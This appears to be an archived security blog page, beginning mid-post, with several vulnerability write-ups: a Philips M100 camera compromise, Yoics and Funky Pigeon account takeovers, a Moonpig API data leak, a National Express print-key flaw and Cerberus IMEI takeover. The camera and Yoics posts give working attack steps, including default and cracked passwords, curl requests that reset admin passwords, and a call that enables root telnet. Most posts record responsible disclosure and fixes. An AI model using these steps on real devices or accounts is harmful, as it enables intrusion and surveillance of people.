connected. We confirm this from my routers ARP table:</p> <pre><code> 00:00:48:02:2A:E3:6C </code></pre> <p>and a ping. I suspect port 80 and RTP ports will be open, let's check with an nmap scan:</p> <pre><code class="language-bash">root@debian: # nmap -v -O -sV -A -T4 [...] 23/tcp open telnet syn-ack Busybox telnetd 80/tcp open http syn-ack lighttpd 1.4.24 88/tcp open tcpwrapped syn-ack 554/tcp open sip syn-ack RtpRtspServer (Status: 200 OK) 1935/tcp open rtmp? syn-ack 8080/tcp open http-proxy? syn-ack </code></pre> <p>Telnet seems like a good place to start. After a few login attempts using common root passwords I notice there is a ~5 seconds delay between each attempt so unfortunately it looks like an online brute force attack is out of the question.</p> <p>The web interface doesn't give much out either and requires authentication. We know the Android app talks to the camera directly, presumably through the web interface or some sort of API, so let's run it through apktool and take a look at the Java code.</p> <h3 id="theandroidapp">The Android App</h3> <p>In the class <code>HttpCommon</code> we find these static variables:</p> <pre><code class="language-lanaguge-java">public static final String CAMERA_USERNAME = "admin"; public static final String CAM_DEFAULT_PASSWD = "M100-4674448"; </code></pre> <p>Really?</p> <p><img src="/assets/img/phillips_1.png" alt=""></p> <p>Really. Okay, so we don't get much and trying regular directories (/admin, /cgi-bin) doesn't give us anything. Fortunately our friend <code>HttpCommon</code> gives us a list of all available resources. A few in particular caught my eye:</p> <pre><code class="language-java">public static final String HTTP_RES_ROOT_PATH = "/cgi-bin/v1"; public static final String HTTP_RES_CAMERA = "/camera"; public static final String HTTP_RES_FW_AUTOUPGRADE = "/firmware/autoupgrade"; public static final String HTTP_RES_FW_VERSION = "/firmware/version"; public static final String HTTP_RES_JPEG_BIG = "/cgi-bin/img-0.cgi"; public static final String HTTP_RES_RTSP_SES_BIG = "/stream0"; public static final String HTTP_RES_SET_CAM_PASSWD = "/users/admin"; </code></pre> <p>The last one got me excited. But let's start from the top.</p> <p><code>GET /camera</code> returned a 404. Hmm. <code>Get /cgi-bin/img-0.cgi</code> worked and spits out a picture from the camera. Everything else 404'd. The first variable stood out: <code>HTTP_RES_ROOT_PATH</code>. Maybe... <code>GET /cgi-bin/v1/camera</code> - bingo! <code>GET /stream0</code> shows me a live video stream, very handy for snooping.</p> <p>From the Java code we can see that <code>/users/admin</code> is a <code>POST</code> request with an XML body, here's a typical request:</p> <pre><code class="language-bash">curl -H 'Authorization: b64(admin:M100-4674448)' -H 'Content-Type: application/xml' -X 'POST' --data '&lt;users&gt;&lt;admin&gt;&lt;password s="newpassword" /&gt;&lt;/admin&gt;&lt;/users&gt;' '' </code></pre> <p><strong>And the password has been changed.</strong> This didn't work for <code>root</code> and you can't login with them via telnet so I assume it has it's own internal database.</p> <p>At least now I can view the camera stream, listen to live audio and even view DropBox oAuth keys, Twitter username/password and YouTube username/password if the user has set them.</p> <p>It's at this point I decided to update the firmware as there's no point in finding a root exploit if it's already been patched. Unfortunately this disabled telnet :-(. I then registered the camera with Yoics which disabled the <em>default</em> password. Let's see what's going on.</p> <p>When you first register the device with Yoics it changes the admin password via the <code>POST /users/admin</code> HTTP request. Lucky for us the password is generated client side in the Android app via this function:</p> <pre><code class="language-java">public static String generateCamPassword(String paramString) { String str = generateMd5Hash(paramString).substring(0, 10); return "i" + str; } </code></pre> <p>This calculates the md5 of <code>paramString</code>, which is the cameras MAC address, takes the first 10 characters and appends it to <code>i</code>. So given our MAC of <code>00:00:48:02:2A:E3:6C</code> we can generate a password of <code>i2a5f126c7e</code>. <strong>And we're back in.</strong></p> <p>Now I'm pretty sure that if we sit and blind inject various CGI scripts we could escalate our privileges, but ain't nobody got time for that. Let's go deeper.</p> <h3 id="thefirmware">The Firmware</h3> <p>We now know the camera can download and update it's own firmware so let's extract it ourselves and find out what lies within.</p> <h6 id="obtaining">Obtaining</h6> <p>When you first open up the Philips Android app it makes a request to <code>http://philips.yoics.net/M100/philips_insight_m100_revisions.xml</code> and saves the response locally. The file contains a list of firmware revisions and this is the latest:</p> <pre><code class="language-xml">&lt;revision&gt; &lt;RevisionSequence&gt;7.3&lt;/RevisionSequence&gt; &lt;RevisionVersion&gt;47283&lt;/RevisionVersion&gt; &lt;ReleaseDate&gt;12Nov2014_1807&lt;/ReleaseDate&gt; &lt;ReleaseLabel&gt;7.3&lt;/ReleaseLabel&gt; &lt;iOSState&gt;active&lt;/iOSState&gt; &lt;iOSMinCompatability&gt;1.8&lt;/iOSMinCompatability&gt; &lt;AndroidState&gt;active&lt;/AndroidState&gt; &lt;AndroidMinCompatability&gt;1.2.5&lt;/AndroidMinCompatability&gt; &lt;DownloadURL&gt; http://philips.yoics.net/M100/RC7.3&lt;/DownloadURL&gt; &lt;ReleaseNotes&gt;Dropbox TLS SSL Support&lt;/ReleaseNotes&gt; &lt;ReleaseNotesURL&gt; http://philips.yoics.com/M100/RC7.3/release_notes.txt&lt;/ReleaseNotesURL&gt; &lt;UpgradeMode&gt;0&lt;/UpgradeMode&gt; &lt;Priority&gt;Critical&lt;/Priority&gt; &lt;UserFilter /&gt; &lt;ReminderDays&gt;1&lt;/ReminderDays&gt; &lt;FullUpgradeRequired&gt;5.4,5.5&lt;/FullUpgradeRequired&gt; &lt;/revision&gt; </code></pre> <p>The <code>DownloadUrl</code> returns a 403 so I suspect we need to append a filename as well, let's confirm this. When you click the "update firmware" button in the Android app it sends the request <code>POST /firmware/autoupgrade</code> to the camera with the XML body:</p> <pre><code class="language-xml">&lt;firmware&gt; &lt;autoupgrade&gt; &lt;path s="DOWNLOAD_URL_FROM_ABOVE" /&gt; &lt;type ul="M100" /&gt; &lt;/autoupgrade&gt; &lt;/firmware&gt; </code></pre> <p>Presumably the camera has hard-coded strings of the file names and appends it to the download URL. The easiest way to find the filename is to replay the above request but change the path to a HTTP server we control so we can see what is being requested.</p> <p><em>I later learned that there is no signature checking of any kind for the firmware so it's pretty much game over from here. You could write your own firmware (using the Toolchain above) and get the camera to install it.</em></p> <p>We then see three files requested within the logs:</p> <pre><code> </code></pre> <h6 id="extracting">Extracting</h6> <p>Let's start with <code>Philips-InSight-snor-rootfs.img</code> where the actual URL is <code>http://philips.yoics.net/M100/RC7.3/Philips-InSight-snor-rootfs.img</code>:</p> <pre><code class="language-bash">root@debian: # file Philips-InSight-snor-rootfs.img Philips-InSight-snor-rootfs.img: Squashfs filesystem, little endian, version 4.0, 6548147 bytes, 948 inodes, blocksize: 131072 bytes, created: Thu Nov 13 02:18:09 2014 root@debian: # unsquashfs Philips-InSight-snor-rootfs.img [===================================================================\] 847/847 100% </code></pre> <p>Well that was easy. I was at least expecting it to be LZMA compressed with offets changed or some sort of XOR encryption. No fun!</p> <h3 id="poppingshells">Popping Shells</h3> <p>First thing's first:</p> <pre><code class="language-bash">root@debian: # cat ./squashfs-root/etc/shadow root:acotQ3OjTXpo.:12773:0:99999:7::: admin:CTedwasnlmwJM:12773:0:99999:7::: mg3500:aa6nn6TYobAEw:12773:0:99999:7::: </code></pre> <p>We'll let <a href="http://www.openwall.com/john/">John</a> have a pop at them, you never kn... oh, straight away it found the <code>mg3500</code> user with a password of <code>merlin</code>. Since telnet was now disabled we can't do much with it. Let's try our luck: </p> <pre><code class="language-bash">root@debian: # fgrep -Rli "telnetd" ./squashfs-root/* var/www/cgi-bin/cam_service_enable.cgi root@debian: # cat ./squashfs-root/var/www/cgi-bin/cam_service_enable.cgi echo "telnet stream tcp nowait root /usr/sbin/telnetd /usr/sbin/telnetd" &gt; /tmp/inetd.conf </code></pre> <p>Very lucky indeed. The script adds telnet (<strong>running as root</strong>) to the list of startup services. Let's call the script using the credentials we generated earlier, and try telnet again:</p> <pre><code class="language-bash">root@debian: # curl -H 'Authorization: b64(admin:i2a5f126c7e)' '' root@debian: # telnet Login: mg3500 Password: merlin mg3500@m100: $ </code></pre> <p>And we're in. As expected from an embedded device everything is read-only and held in RAM, unless you write to the NVRAM. Permissions are totally locked down and no files are writeable by our user. If we run <code>ps</code> to get a list of processes I notice that the HTTP server (lighttpd 1.4.24) is running as root, oh dear.</p> <p>Looking at the httpd configs and physical file paths I come across an admin page (/7445477) which allows you view/set every option thinkable:</p> <p><img src="/assets/img/phillips_2.png" alt=""></p> <p><strong>Hold up</strong>... John has found the root password: <code>insightr</code>.</p> <pre><code class="language-bash">root@debian: # telnet Login: root Password: insightr mg3500@m100: # </code></pre> <p>That's cheating, right? Maybe. From here you can completey compromise the device by changing settings, writing custom scripts to extract camera images on a regular basis, etc.</p> <p>There is an exploit in a few of the CGI scripts where you can pass in arbitrary commands and because the webserver is running as root you have free rein. I will, however, leave that for part 2 ;-).</p> <div></div>
    Paul Price paul@darkport.co.uk
  • 29 Jan '15 Yoics: account takeover vulnerability
    Full account takeover in an IoT cloud provider used by numerous manufacturers such as Cisco and Phillips.
  • Yoics: account takeover vulnerability 2015-01-29

    Yoics market themselves as "secure cloud networking" and is a service that allows you to "Internet access (almost) anything". Many top brands use Yoics in their devices; Cisco, Astak, Philips and more. A good example is the Philips In.Sight M100 Wireless Home Monitor.

    <p><em><a href="http://www.yoics.net">Yoics</a> market themselves as "secure cloud networking" and is a service that allows you to "Internet access (almost) anything". Many top brands use Yoics in their devices; Cisco, Astak, Philips and more. A good example is the <a href="http://www.philips.co.uk/c-p/M100_05/wireless-home-monitor">Philips In.Sight M100 Wireless Home Monitor</a>.</em></p> <p>It was possible for an attacker to manipulate the API call used for password resets and reset the password to any account, providing they know the users e-mail address.</p> <p>Let's take a look at the raw HTTP requests.</p> <p>To begin the password reset process we first get the security question that we need to answer: </p> <pre><code class="language-http">GET /web/api/user.ashx?key=PhilipsAndroid&amp;email=6140622e636f6d&amp;action=getsecurityquestion&amp;type=xml </code></pre> <p>The <code>email</code> field is just the e-mail address hex encoded. The call simply returns the security question: <code>&lt;passwordquestion&gt;Favorite Pet's Name&lt;/passwordquestion&gt;</code></p> <p>To complete the password reset process we send another HTTP request with the answer:</p> <pre><code class="language-http">GET /web/api/user.ashx?key=PhilipsAndroid&amp;email=6140622e636f6d&amp;answer=626f62&amp;skipemail=no&amp;action=recoverpassword&amp;type=xml HTTP/1.1 </code></pre> <p>Again, the <code>answer</code> parameter is just hex encoded. If the answer is wrong we get back a simple error message. All is good.</p> <p>After trying various different combinations I noticed if you ommit the <code>answer</code> parameter entirely you get a <code>&lt;status&gt;ok&lt;/status&gt;</code> message. <strong>Has it been reset?</strong> A few minutes later I received the standard password reset e-mail. <em>Hmm, I wonder...</em> Let's try setting the <code>skipemail</code> parameter to yes:</p> <pre><code class="language-http">GET /web/api/user.ashx?key=PhilipsAndroid&amp;email=6140622e636f6d&amp;skipemail=yes&amp;action=recoverpassword&amp;type=xml HTTP/1.1 </code></pre> <p>And the response:</p> <pre><code class="language-xml"> &lt;status&gt;ok&lt;/status&gt; &lt;password&gt;0d8jerg&lt;/password&gt; </code></pre> <p>Wham, bam, thank you ma'am. From here an attacker can login with the given password and access the the users IoT devices remotely.</p> <h2 id="responsibledisclosure">Responsible Disclosure</h2> <ul> <li><strong>27/01/2015</strong> - Initial contact made with vendor.</li> <li><strong>29/01/2015</strong> - Vendor confirmed the bug and will fix as a priority (within 24 hours).</li> <li><strong>30/01/2015</strong> - Patch is live in production. Confirmed fixed.</li> </ul>
    Paul Price paul@darkport.co.uk
  • 5 Jan '15 Moonpig Vulnerability
    Unauthenticated API endpoints exposed personal and financial details of 3 million customers.
  • Moonpig Vulnerability 2015-01-05

    Moonpig are one of the most well known companies that sell personalised greeting cards in the UK. In 2007 they had a 90% market share and shipped nearly 6 million cards. In July 2011 they were bought by PhotoBox.

    <p><em>Moonpig are one of the most well known companies that sell personalised greeting cards in the UK. In 2007 they had a 90% market share and shipped nearly 6 million cards. In July 2011 they were bought by PhotoBox.</em></p> <div style="padding:20px;background-color:#fafafa;text-align:center;margin-bottom:25px;"> <h3 style="margin:0;font-size:20px;">Moonpig have since taken their API offline and Tweeted:</h3> <div style="margin:0 auto;text-align:center;width:500px;"> <blockquote class="twitter-tweet" lang="en-gb"><p>We are aware of claims re customer data and can confirm that all password and payment information is and has always been safe.</p>— Moonpig (@MoonpigUK) <a href="https://twitter.com/MoonpigUK/status/552419988834111489">January 6, 2015</a></blockquote> <script async="" src="//platform.twitter.com/widgets.js" charset="utf-8"></script> </div> <p></p></div><p></p> <p>I've seen some half-arsed security messures in my time but this just takes the biscuit. Whoever architected this system needs to be <del>shot</del> waterboarded.</p> <p>Let's dive straight in and take a look at one of their HTTP requests from the Android app to the Moonpig API.</p> <pre><code class="language-http">GET /rest/MoonpigRestWebservice.svc/addresses?&amp;customerId=5379382&amp;countryCode=9424 HTTP/1.1 Authorization: Basic aXBjiS5lOk1vb25QHjimvF58DEw Host: api.moonpig.com Connection: Keep-Alive </code></pre> <p>Okay so we're using basic authentication, not ideal sending our username and password over in each request (as opposed to a sesssion key) but at least it's over HTTPS - it could be worse.</p> <p>Oh, it is worse. Decoding the auth header we get <code>*redacted*:*redacted*</code>, that's not my username or password - these are static credentials sent with every request. The only identifiable piece of information left is the URL parameter <code>customerId</code>. I created another account, added an address, changed the URL to my new <code>customerId</code> and lo and behold it spits out my saved addresses for the other account:</p> <pre><code class="language-http">GET https://api.moonpig.com/rest/MoonpigRestWebservice.svc/addresses?&amp;customerId=713443990&amp;countryCode=9424 </code></pre> <pre><code class="language-javascript">[ { "Address": "xxxxxx\r\nxxxxxxx\r\nxxxxxxx", "AddressBookId": 414628930, "AddressType": "CustomerAddress", "AddressTypeId": 1, "Anniversary": null, "Birthday": null, "BuildingName": null, "BuildingNumber": null, "Company": "Test", "Country": "United Kingdom", "County": "London", "Custom1": null, "Custom2": null, "Custom3": null, "Custom4": null, "Custom5": null, "CustomerId": 0, "Deleted": false, "DeliveryInstructions": null, "EmailAddress": null, "FacebookId": null, "FilterChar": null, "Firstname": "Test", "Greeting": null, "LastUpdated": "\/Date(147136045396670+0100)\/", "Lastname": "Test", "MainAddressBookId": null, "OtherDate": null, "Postcode": " LN1 3FN", "PostcodeSystemUpdated": null, "SortByLastName": false, "Suffix": null, "TelephoneNo": null, "Title": "", "TitleId": null, "Town": "London" } ] </code></pre> <p>Every API request is like this, <strong>there's no authentication at all</strong> and you can pass in any customer ID to impersonate them. An attacker could easily place orders on other customers accounts, add/retrieve card information, view saved addresses, view orders and much more.</p> <p>At this point one would usually decompile the APK and see if there are any hidden API methods but on this ocassion there's no need, Moonpig have made it easy for us. If you hit the API endpoint with an unknown method you'll get a custom 404 with a link to a help page listing every method available in their API with helpful descriptions. The help page also exposes their internal network DNS setup - but that's another story.</p> <p>From the help file it does seem that the API supports OAuth 2.0 authorization which would fix this vulnerability... if it was implemented in the Android client.</p> <p>One particular method caught my attention: <code>GetCreditCardDetails</code>. Surely not? I hit the method with my test customer ID and we are returned:</p> <pre><code class="language-markup">&lt;ArrayOfCustomerCreditCard xmlns="http://schemas.datacontract.org/2004/07/Moonpig.Model.CustomerAttributes.Accounting" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"&gt; &lt;CustomerCreditCard&gt; &lt;CardType&gt;Credit Card (Unspeci&lt;/CardType&gt; &lt;CustomerId&gt;11466749&lt;/CustomerId&gt; &lt;ExpiryDate&gt;12/18&lt;/ExpiryDate&gt; &lt;LastFourDigits&gt;5993&lt;/LastFourDigits&gt; &lt;NameOnCard&gt;Mr X XXX&lt;/NameOnCard&gt; &lt;TransactionId&gt;5983632541-1/TransactionId&gt; &lt;/CustomerCreditCard&gt; &lt;/ArrayOfCustomerCreditCard&gt; </code></pre> <p>Hey, at least they're not returning the full card number!</p> <p>I hit my test users a few hundred times in quick succession and I was not rate limited. Given that customer IDs are sequential an attacker would find it very easy to build up a database of Moonpig customers along with their addresses and card details in a few hours - very scary indeed.</p> <h3 id="responsibledisclosure">Responsible Disclosure</h3> <ul> <li><em>18th Aug '13</em> - (<strong>yes, 2013!</strong>) Initial contact made with vendor. After a few e-mails back and fourth their reasoning was legacy code and they'll "get right on it".</li> <li><em>26th Sep '14</em> - Follow up e-mail. Issue still not resolved. ETA "before Christmas"</li> <li><em>5th Jan '15</em> - Vulnerability still exists with ample amount of time given to vendor to fix the issue.</li> </ul> <p>Initially I was going to wait until they fixed their live endpoints but given the timeframes I've decided to publish this post to force Moonpig to fix the issue and protect the privacy of their customers (who knows who else knows about this!). ~17 months is more than enough time to fix an issue like this. It appears customer privacy is not a priority to Moonpig.</p>
    Paul Price paul@darkport.co.uk
  • 25 Sep '14 National Express print-at-home vulnerability
    Information disclosure vulnerability for the UK's largest scheduled coach operator.
  • National Express print-at-home vulnerability 2014-09-15

    This is a fine example of developers being lazy and how not to implement "security".

    <p><em>This is a fine example of developers being lazy and how <strong>not</strong> to implement "security".</em></p> <p>National Express are one of the biggest public transport companies in the UK with a huge fleet of coaches and trains.</p> <div style="padding:20px;margin-bottom:30px;background-color:#f0f0f0;text-align:center;"> <h3 style="margin-bottom:20px;">This has been patched.</h3> <div style="margin 0 auto; text-align:center;width:100%;margin-left:80px;"> <blockquote class="twitter-tweet" data-conversation="none" lang="en"><p><a href="https://twitter.com/RiskObscurity">@RiskObscurity</a> <a href="https://twitter.com/NX_MD">@NX_MD</a> We had confirmation at 16:30 yesterday that this had been patched, so it will no longer work. ^dl</p>— NX Customer Service (@nxcare) <a href="https://twitter.com/nxcare/status/515761387269013504">September 27, 2014</a></blockquote> <script async="" src="//platform.twitter.com/widgets.js" charset="utf-8"></script> </div> <p style="margin:0;">Another one of there @ replies suggests they did reply to my e-mails within 24 hours, but nothing was received.</p> <p></p></div><p></p> <p>This vulnerability discloses customers information to a potential attacker such as the passengers names, destination, last 4 digits of the card, price the customer paid for the tickets and of course the ticket itself.</p> <p>An attacker could potentially disrupt customers journeys by amending or even cancelling bookings using the online <a href="http://coach.nationalexpress.com/nxbooking/manageMyBooking">Manage Booking</a> service, which is accessed by entering a ticket number and the last 4 digits of the card. If one was to be malicious you would write a program that constantly checks for new tickets and then automatically changes the destination, for example.</p> <p>If may also be possible to plot customers on a map who are currently on a National Express coach by integrating with the <a href="http://coachtracker.nationalexpress.com/">Live Coach Tracker</a>.</p> <h3 id="theissue">The Issue</h3> <p>After you purchase an e-ticket (print-at-home) you are sent to the "print ticket" page:</p> <p><img src="/content/images/2014/Sep/neticket-1.png" alt=""></p> <p>Let's break down the URL: <code>http://coach.nationalexpress.com/nxbooking/print-ticket?ticketnumber=XXXXXXXX&amp;printKey=999388f7bd7d07ae</code></p> <p>The <code>ticketnumber</code> seems to be a sequential 8-character-long alphanumeric. The first 6 characters are A-Z and the last two are 0-9 - a few examples:</p> <pre><code>FFCBCH73 FFCYMG19 FFCYCG44 </code></pre> <p>Now for the <code>printkey</code>. Just by looking at the value it looks like half-MD5. The first thing I tried was to MD5 the ticket number which gives: <code>1c6e488449e3741a<strong>999388f7bd7d07ae</strong></code>. Errr what... could it be?! <strong>Yep</strong>, the last 16 characters is our <code>printkey</code> - fantastic security.</p> <p>One could write a simple program that generates a bunch of ticket numbers and print keys, hit the endpoint and parse out the HTML. As there is no rate-control an attacker could easily pull out 1000s of tickets within minutes.</p> <p>There is no excuse here, it's pure lazyiness. Ideally you would generate a random string (e.g. uuid) and store this along with the ticket number but that requires database schema changes and may not be easy/quick to implement depending on their infrastructure. A simple "quick fix" solution would be to use HMAC-SHA256 to hash the ticket number with a private key. Any old URLs with an MD5 print key can be redirected to the "Manage Booking" page so the user has to explicitly authenticate themselves.</p> <h3 id="responsibledisclosure">Responsible Disclosure</h3> <p>I attempted to contact National Express via their website on three occasions over three months with no response. Hopefully this blog post grabs their attention and forces them to patch the vulnerability and protect their customers.</p> <ul> <li><em>Jul '14</em> - Attempted initial contact with vendor - no response.</li> <li><em>Aug '14</em> - 2nd attempt to contact vendor - no response.</li> <li><em>13th Sep '14</em> - Final attempt to contact vendor - no response.</li> <li><em>25th Sep '14</em> - Full disclosure.</li> </ul>
    Paul Price paul@darkport.co.uk
  • 19 Dec '13 Cerberus anti-theft – an exploit allowing you to access any device
    Exploiting an anti-theft app to compromise thousands of devices worldwide.
  • Cerberus anti-theft – an exploit allowing you to access any device 2013-12-19

    You may or may not have heard of Cerberus, an anti-theft application for Android devices. Cerberus allows you to remotely control your device if it has been lost or stolen. Features include: locate and track your device, start alarms, get a list of recent calls, download SMS messages, take pictures, record video, record audio and much more – all of which is done discreetly without the “thief” knowing so you can track your phone down and attempt to recover it. Pretty cool, right? Now imagine if anyone could access your device and listen to your conversations. A security hole in Cerberus allows just that.

    <p>You may or may not have heard of <a href="https://play.google.com/store/apps/details?id=com.lsdroid.cerberus&amp;hl=en">Cerberus</a>, an anti-theft application for Android devices. Cerberus allows you to remotely control your device if it has been lost or stolen. Features include: locate and track your device, start alarms, get a list of recent calls, download SMS messages, take pictures, record video, record audio and much more – all of which is done discreetly without the “thief” knowing so you can track your phone down and attempt to recover it. Pretty cool, right? <strong>Now imagine if anyone could access your device and listen to your conversations. A security hole in Cerberus allows just that.</strong></p> <div style="padding:20px;margin-bottom:30px;background-color:#fafafa;text-align:center;"> <h3 style="margin:0;">This has been fixed, see below</h3> </div> <h3 id="cerberussecurity">Cerberus Security</h3> <p>You may think Cerberus is pretty secure. You have a username and password, which only you know, similar to Facebook and practically every other website out there with a login system. 99% of the time this is fine and accepted standard for authenticating yourself. The problem here lies with what’s going on behind the scenes. When you login with your username and password the Cerberus API replies back with a “device ID” which is a seemingly 15 digit randomly generated number, this id is then used in subsequent requests and used to “authenticate” you – that’s right, your username/password aren’t used past the initial stage. Upon further investigation it turns out that this number is your devices IMEI number.</p> <h3 id="anatomyofanimeinumber">Anatomy of an IMEI number</h3> <p>Before we delve in further let’s take a quick look at the format of an IMEI number. IMEI numbers are not distributed uniformly at random. The first 8 digits of an IMEI represent the Type Allocation Code (TAC), which is determined by the model of the phone. For example, because I have a Samsung Galaxy Note 2, the first 8 digits of my IMEI are 35362705. Although this is the most significant portion of my IMEI number, it is not private information; knowing the model of my phone (or guessing the model) is sufficient to guess most of my IMEI number.</p> <p>After the 8-digit TAC there are 6 digits that uniquely identify the specific device. <strong>These 6 digits are the only digits that are difficult for an attacker to guess.</strong> After those 6 digits the last digit is a Luhn-checksum digit, which is computed as a function of the first 14 digits. Thus, in a 15-digit IMEI number there is a relatively low amount of randomness.</p> <p>Further Reading:</p> <ol> <li><a href="http://blog.dasient.com/2011/07/hashing-imei-numbers-does-not-protect.html">http://blog.dasient.com/2011/07/hashing-imei-numbers-does-not-protect.html</a> </li> <li><a href="http://en.wikipedia.org/wiki/International_Mobile_Station_Equipment_Identity">http://en.wikipedia.org/wiki/International<em>Mobile</em>Station<em>Equipment</em>Identity </a></li> </ol> <h3 id="theattack">The attack</h3> <p>You can easily generate 106 (1,000,000) numbers within seconds, it’s verifying them that takes time. To verify an IMEI is valid and Cerberus has that device registered on their system you have to fire off an HTTP request. On my machine I can do 14 verifications a second in a single thread. One could verify <strong>ALL</strong> IMEI numbers for a Samsung Galaxy Note 2 within 15 hours. I managed to randomly generate a bunch of IMEIs (with the Note 2 TAC) and verify my own IMEI within 2 hours - obviously a lot of luck was involved in this but you get the idea.</p> <p>When "verifying" an IMEI number the Cerberus API kindly returns back the username and SHA1 hashed password associated with that device – thanks guys! So what are we going to do? Maybe run the password hash through a rainbow table? You could do, but that would take a while and Cerberus have made it much easier for us. When you reset your password via the Android app it sends a request with only your device ID (IMEI) and new password, there’s no username or old password to verify who you are. When you’ve updated the password for the account associated with that device you can login via the Cerberus dashboard and control the phone as if it were your own. I have successfully tried this out on two of my android phones with trail accounts.</p> <h3 id="canipreventthis">Can I prevent this?</h3> <p>No. Not until Cerberus fix their systems. If you’re looking for some kind of comfort it will be quite difficult for an attacker to personally target your device unless they know your IMEI number. They will stand more of a chance if they know your device model and thus only have to guess the 6 random digits, which could easily be done in a few hours. They would then have to some how tie your username to your real name to identify you. Again this could easily be done by looking at your accounts e-mail address or cross referencing information such as your phones location, recent SMS messages, etc. If I wanted to snoop on someone I knew and I know that they use Cerberus it would only take ~20 seconds alone with their phone to note down the IMEI number and access their account and from there I can view SMSes, track their location history and record videos.</p> <p>I have e-mailed Cerberus bringing this to their attention but they are yet to respond. I hope this post changes that and they fix it ASAP. I will update this post accordingly.</p> <p><strong>Update</strong>: Cerberus have said this will be fixed in their next version, 2.4 which will be published “soon”. I have downloaded the latest 2.4 beta and the exploit still exists.</p> <p><strong>Update 2</strong>: This has been fixed server-side, props to Luca for fixing it quickly. See <a href="https://groups.google.com/forum/#!topic/cerberus-support-forum/H7fuB4TCk8Q">https://groups.google.com/forum/#!topic/cerberus-support-forum/H7fuB4TCk8Q</a> for more info.</p>
    Paul Price paul@darkport.co.uk
  • 24 Oct '13 Funky Pigeon - account take over
  • Funky Pigeon - account take over 2013-10-24

    If you have an account with FunkyPigeon.com then you should be extremely concerned. It is possible for an attacker to gain access to your account which can contain your address details, recent orders, any uploaded photos, your contacts (and their addresses) and your reminders – all of this information can be changed, as well as your password, e-mail address and “security” question. An attacker could use your account balance to order a card in your name.

    <p>If you have an account with FunkyPigeon.com then you should be extremely concerned. It is possible for an attacker to gain access to your account which can contain your address details, recent orders, any uploaded photos, your contacts (and their addresses) and your reminders – all of this information can be changed, as well as your password, e-mail address and “security” question. An attacker could use your account balance to order a card in your name.</p> <div style="padding:20px;background-color:#fafafa;text-align:center;"> <h3 style="margin:0;">This has been fixed, see below</h3> </div> <p>I won’t disclose how this as done as I’ll give them a chance to fix it first. Below you can see we have found Nina Greaves' account who was the "SEO &amp; Internet Marketing Specialist" at FunkyPigeon.com (this information is publicly available):</p> <pre><code>"user": { "account_balance": 0.01, "address_id": null, "auth_token": "", "avatar": "", "email": "nina.greaves@spiltinkstudio.co.uk", "first_name": "Nina", "has_facebook": false, "last_name": "Greaves", "tel": "", "title": "Miss", "user_id": 5 } </code></pre> <p>At this point an attacker could issue an update command to change Nina’s e-mail address and then request a password reset to gain access to her account. If Nina had any balance in her account an order could be placed in her name.</p> <h3 id="howcanipreventthis">How can I prevent this?</h3> <p>The answer to this is unfortunately <strong>don't have a FunkyPigeon account</strong>. If you already have one then there’s nothing you can do – you’ll just have to wait until they fix it. I have e-mailed Split Ink Studio (who own FunkyPigeon) and raised an issue with them so hopefully it should be fixed pretty soon. Fortunately (some-what) it’s not so trivial to attack a particular user. For example you can’t gain access to an account via an e-mail address, you have to know the users id beforehand. Although as user ids are incremental it would be pretty easy for an attacker to compose a database of all FunkyPigeon accounts and search upon this.</p> <h3 id="thefix">The fix</h3> <p>The API supports an “auth_token” which is presumably some sort of session variable for that user. It is returned when you issue a login command, however it is always blank and isn’t required for subsequent requests.</p> <p>They seem to have around 1.7 million accounts on the database so a lot of people should be worried. And rightly so. I’ll keep this post updated on any official statement from them.</p> <p><strong>Update</strong>: Funky Pigeon have responded and basically said they will fix it ASAP, although they haven’t given any specific time frames. You would of thought it would be at the top of their priorities. As of 28/07/2013 it still works.</p> <p><strong>Update 2</strong>: This has now been fixed and Funky Pigeon have implemented the use of the auth_token field.</p>
    Paul Price paul@darkport.co.uk